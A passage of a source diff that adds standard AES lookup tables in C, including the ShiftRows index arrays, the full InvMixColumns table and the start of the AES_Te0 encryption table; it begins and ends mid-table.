0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, + 0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, + 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4, + 0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, + 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F, + 0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, + 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF, + 0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, + 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61, + 0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, + 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D, +}; + +const uint8_t AES_shifts[16] = { + 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11 +}; + +const uint8_t AES_ishifts[16] = { + 0, 13, 10, 7, 4, 1, 14, 11, 8, 5, 2, 15, 12, 9, 6, 3 +}; + +/* AES_imc[x][0] = [x].[0e, 09, 0d, 0b]; */ +/* AES_imc[x][1] = [x].[0b, 0e, 09, 0d]; */ +/* AES_imc[x][2] = [x].[0d, 0b, 0e, 09]; */ +/* AES_imc[x][3] = [x].[09, 0d, 0b, 0e]; */ +const uint32_t AES_imc[256][4] = { + { 0x00000000, 0x00000000, 0x00000000, 0x00000000, }, /* x=00 */ + { 0x0E090D0B, 0x0B0E090D, 0x0D0B0E09, 0x090D0B0E, }, /* x=01 */ + { 0x1C121A16, 0x161C121A, 0x1A161C12, 0x121A161C, }, /* x=02 */ + { 0x121B171D, 0x1D121B17, 0x171D121B, 0x1B171D12, }, /* x=03 */ + { 0x3824342C, 0x2C382434, 0x342C3824, 0x24342C38, }, /* x=04 */ + { 0x362D3927, 0x27362D39, 0x3927362D, 0x2D392736, }, /* x=05 */ + { 0x24362E3A, 0x3A24362E, 0x2E3A2436, 0x362E3A24, }, /* x=06 */ + { 0x2A3F2331, 0x312A3F23, 0x23312A3F, 0x3F23312A, }, /* x=07 */ + { 0x70486858, 0x58704868, 0x68587048, 0x48685870, }, /* x=08 */ + { 0x7E416553, 0x537E4165, 0x65537E41, 0x4165537E, }, /* x=09 */ + { 0x6C5A724E, 0x4E6C5A72, 0x724E6C5A, 0x5A724E6C, }, /* x=0A */ + { 0x62537F45, 0x4562537F, 0x7F456253, 0x537F4562, }, /* x=0B */ + { 0x486C5C74, 0x74486C5C, 0x5C74486C, 0x6C5C7448, }, /* x=0C */ + { 0x4665517F, 0x7F466551, 0x517F4665, 0x65517F46, }, /* x=0D */ + { 0x547E4662, 0x62547E46, 0x4662547E, 0x7E466254, }, /* x=0E */ + { 0x5A774B69, 0x695A774B, 0x4B695A77, 0x774B695A, }, /* x=0F */ + { 0xE090D0B0, 0xB0E090D0, 0xD0B0E090, 0x90D0B0E0, }, /* x=10 */ + { 0xEE99DDBB, 0xBBEE99DD, 0xDDBBEE99, 0x99DDBBEE, }, /* x=11 */ + { 0xFC82CAA6, 0xA6FC82CA, 0xCAA6FC82, 0x82CAA6FC, }, /* x=12 */ + { 0xF28BC7AD, 0xADF28BC7, 0xC7ADF28B, 0x8BC7ADF2, }, /* x=13 */ + { 0xD8B4E49C, 0x9CD8B4E4, 0xE49CD8B4, 0xB4E49CD8, }, /* x=14 */ + { 0xD6BDE997, 0x97D6BDE9, 0xE997D6BD, 0xBDE997D6, }, /* x=15 */ + { 0xC4A6FE8A, 0x8AC4A6FE, 0xFE8AC4A6, 0xA6FE8AC4, }, /* x=16 */ + { 0xCAAFF381, 0x81CAAFF3, 0xF381CAAF, 0xAFF381CA, }, /* x=17 */ + { 0x90D8B8E8, 0xE890D8B8, 0xB8E890D8, 0xD8B8E890, }, /* x=18 */ + { 0x9ED1B5E3, 0xE39ED1B5, 0xB5E39ED1, 0xD1B5E39E, }, /* x=19 */ + { 0x8CCAA2FE, 0xFE8CCAA2, 0xA2FE8CCA, 0xCAA2FE8C, }, /* x=1A */ + { 0x82C3AFF5, 0xF582C3AF, 0xAFF582C3, 0xC3AFF582, }, /* x=1B */ + { 0xA8FC8CC4, 0xC4A8FC8C, 0x8CC4A8FC, 0xFC8CC4A8, }, /* x=1C */ + { 0xA6F581CF, 0xCFA6F581, 0x81CFA6F5, 0xF581CFA6, }, /* x=1D */ + { 0xB4EE96D2, 0xD2B4EE96, 0x96D2B4EE, 0xEE96D2B4, }, /* x=1E */ + { 0xBAE79BD9, 0xD9BAE79B, 0x9BD9BAE7, 0xE79BD9BA, }, /* x=1F */ + { 0xDB3BBB7B, 0x7BDB3BBB, 0xBB7BDB3B, 0x3BBB7BDB, }, /* x=20 */ + { 0xD532B670, 0x70D532B6, 0xB670D532, 0x32B670D5, }, /* x=21 */ + { 0xC729A16D, 0x6DC729A1, 0xA16DC729, 0x29A16DC7, }, /* x=22 */ + { 0xC920AC66, 0x66C920AC, 0xAC66C920, 0x20AC66C9, }, /* x=23 */ + { 0xE31F8F57, 0x57E31F8F, 0x8F57E31F, 0x1F8F57E3, }, /* x=24 */ + { 0xED16825C, 0x5CED1682, 0x825CED16, 0x16825CED, }, /* x=25 */ + { 0xFF0D9541, 0x41FF0D95, 0x9541FF0D, 0x0D9541FF, }, /* x=26 */ + { 0xF104984A, 0x4AF10498, 0x984AF104, 0x04984AF1, }, /* x=27 */ + { 0xAB73D323, 0x23AB73D3, 0xD323AB73, 0x73D323AB, }, /* x=28 */ + { 0xA57ADE28, 0x28A57ADE, 0xDE28A57A, 0x7ADE28A5, }, /* x=29 */ + { 0xB761C935, 0x35B761C9, 0xC935B761, 0x61C935B7, }, /* x=2A */ + { 0xB968C43E, 0x3EB968C4, 0xC43EB968, 0x68C43EB9, }, /* x=2B */ + { 0x9357E70F, 0x0F9357E7, 0xE70F9357, 0x57E70F93, }, /* x=2C */ + { 0x9D5EEA04, 0x049D5EEA, 0xEA049D5E, 0x5EEA049D, }, /* x=2D */ + { 0x8F45FD19, 0x198F45FD, 0xFD198F45, 0x45FD198F, }, /* x=2E */ + { 0x814CF012, 0x12814CF0, 0xF012814C, 0x4CF01281, }, /* x=2F */ + { 0x3BAB6BCB, 0xCB3BAB6B, 0x6BCB3BAB, 0xAB6BCB3B, }, /* x=30 */ + { 0x35A266C0, 0xC035A266, 0x66C035A2, 0xA266C035, }, /* x=31 */ + { 0x27B971DD, 0xDD27B971, 0x71DD27B9, 0xB971DD27, }, /* x=32 */ + { 0x29B07CD6, 0xD629B07C, 0x7CD629B0, 0xB07CD629, }, /* x=33 */ + { 0x038F5FE7, 0xE7038F5F, 0x5FE7038F, 0x8F5FE703, }, /* x=34 */ + { 0x0D8652EC, 0xEC0D8652, 0x52EC0D86, 0x8652EC0D, }, /* x=35 */ + { 0x1F9D45F1, 0xF11F9D45, 0x45F11F9D, 0x9D45F11F, }, /* x=36 */ + { 0x119448FA, 0xFA119448, 0x48FA1194, 0x9448FA11, }, /* x=37 */ + { 0x4BE30393, 0x934BE303, 0x03934BE3, 0xE303934B, }, /* x=38 */ + { 0x45EA0E98, 0x9845EA0E, 0x0E9845EA, 0xEA0E9845, }, /* x=39 */ + { 0x57F11985, 0x8557F119, 0x198557F1, 0xF1198557, }, /* x=3A */ + { 0x59F8148E, 0x8E59F814, 0x148E59F8, 0xF8148E59, }, /* x=3B */ + { 0x73C737BF, 0xBF73C737, 0x37BF73C7, 0xC737BF73, }, /* x=3C */ + { 0x7DCE3AB4, 0xB47DCE3A, 0x3AB47DCE, 0xCE3AB47D, }, /* x=3D */ + { 0x6FD52DA9, 0xA96FD52D, 0x2DA96FD5, 0xD52DA96F, }, /* x=3E */ + { 0x61DC20A2, 0xA261DC20, 0x20A261DC, 0xDC20A261, }, /* x=3F */ + { 0xAD766DF6, 0xF6AD766D, 0x6DF6AD76, 0x766DF6AD, }, /* x=40 */ + { 0xA37F60FD, 0xFDA37F60, 0x60FDA37F, 0x7F60FDA3, }, /* x=41 */ + { 0xB16477E0, 0xE0B16477, 0x77E0B164, 0x6477E0B1, }, /* x=42 */ + { 0xBF6D7AEB, 0xEBBF6D7A, 0x7AEBBF6D, 0x6D7AEBBF, }, /* x=43 */ + { 0x955259DA, 0xDA955259, 0x59DA9552, 0x5259DA95, }, /* x=44 */ + { 0x9B5B54D1, 0xD19B5B54, 0x54D19B5B, 0x5B54D19B, }, /* x=45 */ + { 0x894043CC, 0xCC894043, 0x43CC8940, 0x4043CC89, }, /* x=46 */ + { 0x87494EC7, 0xC787494E, 0x4EC78749, 0x494EC787, }, /* x=47 */ + { 0xDD3E05AE, 0xAEDD3E05, 0x05AEDD3E, 0x3E05AEDD, }, /* x=48 */ + { 0xD33708A5, 0xA5D33708, 0x08A5D337, 0x3708A5D3, }, /* x=49 */ + { 0xC12C1FB8, 0xB8C12C1F, 0x1FB8C12C, 0x2C1FB8C1, }, /* x=4A */ + { 0xCF2512B3, 0xB3CF2512, 0x12B3CF25, 0x2512B3CF, }, /* x=4B */ + { 0xE51A3182, 0x82E51A31, 0x3182E51A, 0x1A3182E5, }, /* x=4C */ + { 0xEB133C89, 0x89EB133C, 0x3C89EB13, 0x133C89EB, }, /* x=4D */ + { 0xF9082B94, 0x94F9082B, 0x2B94F908, 0x082B94F9, }, /* x=4E */ + { 0xF701269F, 0x9FF70126, 0x269FF701, 0x01269FF7, }, /* x=4F */ + { 0x4DE6BD46, 0x464DE6BD, 0xBD464DE6, 0xE6BD464D, }, /* x=50 */ + { 0x43EFB04D, 0x4D43EFB0, 0xB04D43EF, 0xEFB04D43, }, /* x=51 */ + { 0x51F4A750, 0x5051F4A7, 0xA75051F4, 0xF4A75051, }, /* x=52 */ + { 0x5FFDAA5B, 0x5B5FFDAA, 0xAA5B5FFD, 0xFDAA5B5F, }, /* x=53 */ + { 0x75C2896A, 0x6A75C289, 0x896A75C2, 0xC2896A75, }, /* x=54 */ + { 0x7BCB8461, 0x617BCB84, 0x84617BCB, 0xCB84617B, }, /* x=55 */ + { 0x69D0937C, 0x7C69D093, 0x937C69D0, 0xD0937C69, }, /* x=56 */ + { 0x67D99E77, 0x7767D99E, 0x9E7767D9, 0xD99E7767, }, /* x=57 */ + { 0x3DAED51E, 0x1E3DAED5, 0xD51E3DAE, 0xAED51E3D, }, /* x=58 */ + { 0x33A7D815, 0x1533A7D8, 0xD81533A7, 0xA7D81533, }, /* x=59 */ + { 0x21BCCF08, 0x0821BCCF, 0xCF0821BC, 0xBCCF0821, }, /* x=5A */ + { 0x2FB5C203, 0x032FB5C2, 0xC2032FB5, 0xB5C2032F, }, /* x=5B */ + { 0x058AE132, 0x32058AE1, 0xE132058A, 0x8AE13205, }, /* x=5C */ + { 0x0B83EC39, 0x390B83EC, 0xEC390B83, 0x83EC390B, }, /* x=5D */ + { 0x1998FB24, 0x241998FB, 0xFB241998, 0x98FB2419, }, /* x=5E */ + { 0x1791F62F, 0x2F1791F6, 0xF62F1791, 0x91F62F17, }, /* x=5F */ + { 0x764DD68D, 0x8D764DD6, 0xD68D764D, 0x4DD68D76, }, /* x=60 */ + { 0x7844DB86, 0x867844DB, 0xDB867844, 0x44DB8678, }, /* x=61 */ + { 0x6A5FCC9B, 0x9B6A5FCC, 0xCC9B6A5F, 0x5FCC9B6A, }, /* x=62 */ + { 0x6456C190, 0x906456C1, 0xC1906456, 0x56C19064, }, /* x=63 */ + { 0x4E69E2A1, 0xA14E69E2, 0xE2A14E69, 0x69E2A14E, }, /* x=64 */ + { 0x4060EFAA, 0xAA4060EF, 0xEFAA4060, 0x60EFAA40, }, /* x=65 */ + { 0x527BF8B7, 0xB7527BF8, 0xF8B7527B, 0x7BF8B752, }, /* x=66 */ + { 0x5C72F5BC, 0xBC5C72F5, 0xF5BC5C72, 0x72F5BC5C, }, /* x=67 */ + { 0x0605BED5, 0xD50605BE, 0xBED50605, 0x05BED506, }, /* x=68 */ + { 0x080CB3DE, 0xDE080CB3, 0xB3DE080C, 0x0CB3DE08, }, /* x=69 */ + { 0x1A17A4C3, 0xC31A17A4, 0xA4C31A17, 0x17A4C31A, }, /* x=6A */ + { 0x141EA9C8, 0xC8141EA9, 0xA9C8141E, 0x1EA9C814, }, /* x=6B */ + { 0x3E218AF9, 0xF93E218A, 0x8AF93E21, 0x218AF93E, }, /* x=6C */ + { 0x302887F2, 0xF2302887, 0x87F23028, 0x2887F230, }, /* x=6D */ + { 0x223390EF, 0xEF223390, 0x90EF2233, 0x3390EF22, }, /* x=6E */ + { 0x2C3A9DE4, 0xE42C3A9D, 0x9DE42C3A, 0x3A9DE42C, }, /* x=6F */ + { 0x96DD063D, 0x3D96DD06, 0x063D96DD, 0xDD063D96, }, /* x=70 */ + { 0x98D40B36, 0x3698D40B, 0x0B3698D4, 0xD40B3698, }, /* x=71 */ + { 0x8ACF1C2B, 0x2B8ACF1C, 0x1C2B8ACF, 0xCF1C2B8A, }, /* x=72 */ + { 0x84C61120, 0x2084C611, 0x112084C6, 0xC6112084, }, /* x=73 */ + { 0xAEF93211, 0x11AEF932, 0x3211AEF9, 0xF93211AE, }, /* x=74 */ + { 0xA0F03F1A, 0x1AA0F03F, 0x3F1AA0F0, 0xF03F1AA0, }, /* x=75 */ + { 0xB2EB2807, 0x07B2EB28, 0x2807B2EB, 0xEB2807B2, }, /* x=76 */ + { 0xBCE2250C, 0x0CBCE225, 0x250CBCE2, 0xE2250CBC, }, /* x=77 */ + { 0xE6956E65, 0x65E6956E, 0x6E65E695, 0x956E65E6, }, /* x=78 */ + { 0xE89C636E, 0x6EE89C63, 0x636EE89C, 0x9C636EE8, }, /* x=79 */ + { 0xFA877473, 0x73FA8774, 0x7473FA87, 0x877473FA, }, /* x=7A */ + { 0xF48E7978, 0x78F48E79, 0x7978F48E, 0x8E7978F4, }, /* x=7B */ + { 0xDEB15A49, 0x49DEB15A, 0x5A49DEB1, 0xB15A49DE, }, /* x=7C */ + { 0xD0B85742, 0x42D0B857, 0x5742D0B8, 0xB85742D0, }, /* x=7D */ + { 0xC2A3405F, 0x5FC2A340, 0x405FC2A3, 0xA3405FC2, }, /* x=7E */ + { 0xCCAA4D54, 0x54CCAA4D, 0x4D54CCAA, 0xAA4D54CC, }, /* x=7F */ + { 0x41ECDAF7, 0xF741ECDA, 0xDAF741EC, 0xECDAF741, }, /* x=80 */ + { 0x4FE5D7FC, 0xFC4FE5D7, 0xD7FC4FE5, 0xE5D7FC4F, }, /* x=81 */ + { 0x5DFEC0E1, 0xE15DFEC0, 0xC0E15DFE, 0xFEC0E15D, }, /* x=82 */ + { 0x53F7CDEA, 0xEA53F7CD, 0xCDEA53F7, 0xF7CDEA53, }, /* x=83 */ + { 0x79C8EEDB, 0xDB79C8EE, 0xEEDB79C8, 0xC8EEDB79, }, /* x=84 */ + { 0x77C1E3D0, 0xD077C1E3, 0xE3D077C1, 0xC1E3D077, }, /* x=85 */ + { 0x65DAF4CD, 0xCD65DAF4, 0xF4CD65DA, 0xDAF4CD65, }, /* x=86 */ + { 0x6BD3F9C6, 0xC66BD3F9, 0xF9C66BD3, 0xD3F9C66B, }, /* x=87 */ + { 0x31A4B2AF, 0xAF31A4B2, 0xB2AF31A4, 0xA4B2AF31, }, /* x=88 */ + { 0x3FADBFA4, 0xA43FADBF, 0xBFA43FAD, 0xADBFA43F, }, /* x=89 */ + { 0x2DB6A8B9, 0xB92DB6A8, 0xA8B92DB6, 0xB6A8B92D, }, /* x=8A */ + { 0x23BFA5B2, 0xB223BFA5, 0xA5B223BF, 0xBFA5B223, }, /* x=8B */ + { 0x09808683, 0x83098086, 0x86830980, 0x80868309, }, /* x=8C */ + { 0x07898B88, 0x8807898B, 0x8B880789, 0x898B8807, }, /* x=8D */ + { 0x15929C95, 0x9515929C, 0x9C951592, 0x929C9515, }, /* x=8E */ + { 0x1B9B919E, 0x9E1B9B91, 0x919E1B9B, 0x9B919E1B, }, /* x=8F */ + { 0xA17C0A47, 0x47A17C0A, 0x0A47A17C, 0x7C0A47A1, }, /* x=90 */ + { 0xAF75074C, 0x4CAF7507, 0x074CAF75, 0x75074CAF, }, /* x=91 */ + { 0xBD6E1051, 0x51BD6E10, 0x1051BD6E, 0x6E1051BD, }, /* x=92 */ + { 0xB3671D5A, 0x5AB3671D, 0x1D5AB367, 0x671D5AB3, }, /* x=93 */ + { 0x99583E6B, 0x6B99583E, 0x3E6B9958, 0x583E6B99, }, /* x=94 */ + { 0x97513360, 0x60975133, 0x33609751, 0x51336097, }, /* x=95 */ + { 0x854A247D, 0x7D854A24, 0x247D854A, 0x4A247D85, }, /* x=96 */ + { 0x8B432976, 0x768B4329, 0x29768B43, 0x4329768B, }, /* x=97 */ + { 0xD134621F, 0x1FD13462, 0x621FD134, 0x34621FD1, }, /* x=98 */ + { 0xDF3D6F14, 0x14DF3D6F, 0x6F14DF3D, 0x3D6F14DF, }, /* x=99 */ + { 0xCD267809, 0x09CD2678, 0x7809CD26, 0x267809CD, }, /* x=9A */ + { 0xC32F7502, 0x02C32F75, 0x7502C32F, 0x2F7502C3, }, /* x=9B */ + { 0xE9105633, 0x33E91056, 0x5633E910, 0x105633E9, }, /* x=9C */ + { 0xE7195B38, 0x38E7195B, 0x5B38E719, 0x195B38E7, }, /* x=9D */ + { 0xF5024C25, 0x25F5024C, 0x4C25F502, 0x024C25F5, }, /* x=9E */ + { 0xFB0B412E, 0x2EFB0B41, 0x412EFB0B, 0x0B412EFB, }, /* x=9F */ + { 0x9AD7618C, 0x8C9AD761, 0x618C9AD7, 0xD7618C9A, }, /* x=A0 */ + { 0x94DE6C87, 0x8794DE6C, 0x6C8794DE, 0xDE6C8794, }, /* x=A1 */ + { 0x86C57B9A, 0x9A86C57B, 0x7B9A86C5, 0xC57B9A86, }, /* x=A2 */ + { 0x88CC7691, 0x9188CC76, 0x769188CC, 0xCC769188, }, /* x=A3 */ + { 0xA2F355A0, 0xA0A2F355, 0x55A0A2F3, 0xF355A0A2, }, /* x=A4 */ + { 0xACFA58AB, 0xABACFA58, 0x58ABACFA, 0xFA58ABAC, }, /* x=A5 */ + { 0xBEE14FB6, 0xB6BEE14F, 0x4FB6BEE1, 0xE14FB6BE, }, /* x=A6 */ + { 0xB0E842BD, 0xBDB0E842, 0x42BDB0E8, 0xE842BDB0, }, /* x=A7 */ + { 0xEA9F09D4, 0xD4EA9F09, 0x09D4EA9F, 0x9F09D4EA, }, /* x=A8 */ + { 0xE49604DF, 0xDFE49604, 0x04DFE496, 0x9604DFE4, }, /* x=A9 */ + { 0xF68D13C2, 0xC2F68D13, 0x13C2F68D, 0x8D13C2F6, }, /* x=AA */ + { 0xF8841EC9, 0xC9F8841E, 0x1EC9F884, 0x841EC9F8, }, /* x=AB */ + { 0xD2BB3DF8, 0xF8D2BB3D, 0x3DF8D2BB, 0xBB3DF8D2, }, /* x=AC */ + { 0xDCB230F3, 0xF3DCB230, 0x30F3DCB2, 0xB230F3DC, }, /* x=AD */ + { 0xCEA927EE, 0xEECEA927, 0x27EECEA9, 0xA927EECE, }, /* x=AE */ + { 0xC0A02AE5, 0xE5C0A02A, 0x2AE5C0A0, 0xA02AE5C0, }, /* x=AF */ + { 0x7A47B13C, 0x3C7A47B1, 0xB13C7A47, 0x47B13C7A, }, /* x=B0 */ + { 0x744EBC37, 0x37744EBC, 0xBC37744E, 0x4EBC3774, }, /* x=B1 */ + { 0x6655AB2A, 0x2A6655AB, 0xAB2A6655, 0x55AB2A66, }, /* x=B2 */ + { 0x685CA621, 0x21685CA6, 0xA621685C, 0x5CA62168, }, /* x=B3 */ + { 0x42638510, 0x10426385, 0x85104263, 0x63851042, }, /* x=B4 */ + { 0x4C6A881B, 0x1B4C6A88, 0x881B4C6A, 0x6A881B4C, }, /* x=B5 */ + { 0x5E719F06, 0x065E719F, 0x9F065E71, 0x719F065E, }, /* x=B6 */ + { 0x5078920D, 0x0D507892, 0x920D5078, 0x78920D50, }, /* x=B7 */ + { 0x0A0FD964, 0x640A0FD9, 0xD9640A0F, 0x0FD9640A, }, /* x=B8 */ + { 0x0406D46F, 0x6F0406D4, 0xD46F0406, 0x06D46F04, }, /* x=B9 */ + { 0x161DC372, 0x72161DC3, 0xC372161D, 0x1DC37216, }, /* x=BA */ + { 0x1814CE79, 0x791814CE, 0xCE791814, 0x14CE7918, }, /* x=BB */ + { 0x322BED48, 0x48322BED, 0xED48322B, 0x2BED4832, }, /* x=BC */ + { 0x3C22E043, 0x433C22E0, 0xE0433C22, 0x22E0433C, }, /* x=BD */ + { 0x2E39F75E, 0x5E2E39F7, 0xF75E2E39, 0x39F75E2E, }, /* x=BE */ + { 0x2030FA55, 0x552030FA, 0xFA552030, 0x30FA5520, }, /* x=BF */ + { 0xEC9AB701, 0x01EC9AB7, 0xB701EC9A, 0x9AB701EC, }, /* x=C0 */ + { 0xE293BA0A, 0x0AE293BA, 0xBA0AE293, 0x93BA0AE2, }, /* x=C1 */ + { 0xF088AD17, 0x17F088AD, 0xAD17F088, 0x88AD17F0, }, /* x=C2 */ + { 0xFE81A01C, 0x1CFE81A0, 0xA01CFE81, 0x81A01CFE, }, /* x=C3 */ + { 0xD4BE832D, 0x2DD4BE83, 0x832DD4BE, 0xBE832DD4, }, /* x=C4 */ + { 0xDAB78E26, 0x26DAB78E, 0x8E26DAB7, 0xB78E26DA, }, /* x=C5 */ + { 0xC8AC993B, 0x3BC8AC99, 0x993BC8AC, 0xAC993BC8, }, /* x=C6 */ + { 0xC6A59430, 0x30C6A594, 0x9430C6A5, 0xA59430C6, }, /* x=C7 */ + { 0x9CD2DF59, 0x599CD2DF, 0xDF599CD2, 0xD2DF599C, }, /* x=C8 */ + { 0x92DBD252, 0x5292DBD2, 0xD25292DB, 0xDBD25292, }, /* x=C9 */ + { 0x80C0C54F, 0x4F80C0C5, 0xC54F80C0, 0xC0C54F80, }, /* x=CA */ + { 0x8EC9C844, 0x448EC9C8, 0xC8448EC9, 0xC9C8448E, }, /* x=CB */ + { 0xA4F6EB75, 0x75A4F6EB, 0xEB75A4F6, 0xF6EB75A4, }, /* x=CC */ + { 0xAAFFE67E, 0x7EAAFFE6, 0xE67EAAFF, 0xFFE67EAA, }, /* x=CD */ + { 0xB8E4F163, 0x63B8E4F1, 0xF163B8E4, 0xE4F163B8, }, /* x=CE */ + { 0xB6EDFC68, 0x68B6EDFC, 0xFC68B6ED, 0xEDFC68B6, }, /* x=CF */ + { 0x0C0A67B1, 0xB10C0A67, 0x67B10C0A, 0x0A67B10C, }, /* x=D0 */ + { 0x02036ABA, 0xBA02036A, 0x6ABA0203, 0x036ABA02, }, /* x=D1 */ + { 0x10187DA7, 0xA710187D, 0x7DA71018, 0x187DA710, }, /* x=D2 */ + { 0x1E1170AC, 0xAC1E1170, 0x70AC1E11, 0x1170AC1E, }, /* x=D3 */ + { 0x342E539D, 0x9D342E53, 0x539D342E, 0x2E539D34, }, /* x=D4 */ + { 0x3A275E96, 0x963A275E, 0x5E963A27, 0x275E963A, }, /* x=D5 */ + { 0x283C498B, 0x8B283C49, 0x498B283C, 0x3C498B28, }, /* x=D6 */ + { 0x26354480, 0x80263544, 0x44802635, 0x35448026, }, /* x=D7 */ + { 0x7C420FE9, 0xE97C420F, 0x0FE97C42, 0x420FE97C, }, /* x=D8 */ + { 0x724B02E2, 0xE2724B02, 0x02E2724B, 0x4B02E272, }, /* x=D9 */ + { 0x605015FF, 0xFF605015, 0x15FF6050, 0x5015FF60, }, /* x=DA */ + { 0x6E5918F4, 0xF46E5918, 0x18F46E59, 0x5918F46E, }, /* x=DB */ + { 0x44663BC5, 0xC544663B, 0x3BC54466, 0x663BC544, }, /* x=DC */ + { 0x4A6F36CE, 0xCE4A6F36, 0x36CE4A6F, 0x6F36CE4A, }, /* x=DD */ + { 0x587421D3, 0xD3587421, 0x21D35874, 0x7421D358, }, /* x=DE */ + { 0x567D2CD8, 0xD8567D2C, 0x2CD8567D, 0x7D2CD856, }, /* x=DF */ + { 0x37A10C7A, 0x7A37A10C, 0x0C7A37A1, 0xA10C7A37, }, /* x=E0 */ + { 0x39A80171, 0x7139A801, 0x017139A8, 0xA8017139, }, /* x=E1 */ + { 0x2BB3166C, 0x6C2BB316, 0x166C2BB3, 0xB3166C2B, }, /* x=E2 */ + { 0x25BA1B67, 0x6725BA1B, 0x1B6725BA, 0xBA1B6725, }, /* x=E3 */ + { 0x0F853856, 0x560F8538, 0x38560F85, 0x8538560F, }, /* x=E4 */ + { 0x018C355D, 0x5D018C35, 0x355D018C, 0x8C355D01, }, /* x=E5 */ + { 0x13972240, 0x40139722, 0x22401397, 0x97224013, }, /* x=E6 */ + { 0x1D9E2F4B, 0x4B1D9E2F, 0x2F4B1D9E, 0x9E2F4B1D, }, /* x=E7 */ + { 0x47E96422, 0x2247E964, 0x642247E9, 0xE9642247, }, /* x=E8 */ + { 0x49E06929, 0x2949E069, 0x692949E0, 0xE0692949, }, /* x=E9 */ + { 0x5BFB7E34, 0x345BFB7E, 0x7E345BFB, 0xFB7E345B, }, /* x=EA */ + { 0x55F2733F, 0x3F55F273, 0x733F55F2, 0xF2733F55, }, /* x=EB */ + { 0x7FCD500E, 0x0E7FCD50, 0x500E7FCD, 0xCD500E7F, }, /* x=EC */ + { 0x71C45D05, 0x0571C45D, 0x5D0571C4, 0xC45D0571, }, /* x=ED */ + { 0x63DF4A18, 0x1863DF4A, 0x4A1863DF, 0xDF4A1863, }, /* x=EE */ + { 0x6DD64713, 0x136DD647, 0x47136DD6, 0xD647136D, }, /* x=EF */ + { 0xD731DCCA, 0xCAD731DC, 0xDCCAD731, 0x31DCCAD7, }, /* x=F0 */ + { 0xD938D1C1, 0xC1D938D1, 0xD1C1D938, 0x38D1C1D9, }, /* x=F1 */ + { 0xCB23C6DC, 0xDCCB23C6, 0xC6DCCB23, 0x23C6DCCB, }, /* x=F2 */ + { 0xC52ACBD7, 0xD7C52ACB, 0xCBD7C52A, 0x2ACBD7C5, }, /* x=F3 */ + { 0xEF15E8E6, 0xE6EF15E8, 0xE8E6EF15, 0x15E8E6EF, }, /* x=F4 */ + { 0xE11CE5ED, 0xEDE11CE5, 0xE5EDE11C, 0x1CE5EDE1, }, /* x=F5 */ + { 0xF307F2F0, 0xF0F307F2, 0xF2F0F307, 0x07F2F0F3, }, /* x=F6 */ + { 0xFD0EFFFB, 0xFBFD0EFF, 0xFFFBFD0E, 0x0EFFFBFD, }, /* x=F7 */ + { 0xA779B492, 0x92A779B4, 0xB492A779, 0x79B492A7, }, /* x=F8 */ + { 0xA970B999, 0x99A970B9, 0xB999A970, 0x70B999A9, }, /* x=F9 */ + { 0xBB6BAE84, 0x84BB6BAE, 0xAE84BB6B, 0x6BAE84BB, }, /* x=FA */ + { 0xB562A38F, 0x8FB562A3, 0xA38FB562, 0x62A38FB5, }, /* x=FB */ + { 0x9F5D80BE, 0xBE9F5D80, 0x80BE9F5D, 0x5D80BE9F, }, /* x=FC */ + { 0x91548DB5, 0xB591548D, 0x8DB59154, 0x548DB591, }, /* x=FD */ + { 0x834F9AA8, 0xA8834F9A, 0x9AA8834F, 0x4F9AA883, }, /* x=FE */ + { 0x8D4697A3, 0xA38D4697, 0x97A38D46, 0x4697A38D, }, /* x=FF */ +}; + + + +/* +AES_Te0[x] = S [x].[02, 01, 01, 03]; +AES_Te1[x] = S [x].[03, 02, 01, 01]; +AES_Te2[x] = S [x].[01, 03, 02, 01]; +AES_Te3[x] = S [x].[01, 01, 03, 02]; +AES_Te4[x] = S [x].[01, 01, 01, 01]; + +AES_Td0[x] = Si[x].[0e, 09, 0d, 0b]; +AES_Td1[x] = Si[x].[0b, 0e, 09, 0d]; +AES_Td2[x] = Si[x].[0d, 0b, 0e, 09]; +AES_Td3[x] = Si[x].[09, 0d, 0b, 0e]; +AES_Td4[x] = Si[x].[01, 01, 01, 01]; +*/ + +const uint32_t AES_Te0[256] = { + 0xc66363a5U, 0xf87c7c84U, 0xee777799U, 0xf67b7b8dU, + 0xfff2f20dU, 0xd66b6bbdU, 0xde6f6fb1U, 0x91c5c554U, + 0x60303050U, 0x02010103U, 0xce6767a9U, 0x562b2b7dU, + 0xe7fefe19U, 0xb5d7d762U, 0x4dababe6U, 0xec76769aU, + 0x8fcaca45U, 0x1f82829dU, 0x89c9c940U, 0xfa7d7d87U, + 0xeffafa15U, 0xb25959ebU, 0x8e4747c9U, 0xfbf0f00bU, + 0x41adadecU, 0xb3d4d467U, 0x5fa2a2fdU, 0x45afafeaU, + 0x239c9cbfU, 0x53a4a4f7U, 0xe4727296U, 0x9bc0c05bU, + 0x75b7b7c2U, 0xe1fdfd1cU, 0x3d9393aeU, 0x4c26266aU, + 0x6c36365aU, 0x7e3f3f41U, 0xf5f7f702U, 0x83cccc4fU, + 0x6834345cU, 0x51a5a5f4U, 0xd1e5e534U, 0xf9f1f108U, + 0xe2717193U, 0xabd8d873U, 0x62313153U, 0x2a15153fU, + 0x0804040cU, 0x95c7c752U, 0x46232365U, 0x9dc3c35eU, + 0x30181828U, 0x379696a1U, 0x0a05050fU, 0x2f9a9ab5U, + 0x0e070709U, 0x24121236U, 0x1b80809bU, 0xdfe2e23dU, + 0xcdebeb26U, 0x4e272769U, 0x7fb2b2cdU, 0xea75759fU, + 0x1209091bU, 0x1d83839eU, 0x582c2c74U, 0x341a1a2eU, + 0x361b1b2dU, 0xdc6e6eb2U, 0xb45a5aeeU, 0x5ba0a0fbU, + 0xa45252f6U, 0x763b3b4dU, 0xb7d6d661U, 0x7db3b3ceU, + 0x5229297bU, 0xdde3e33eU, 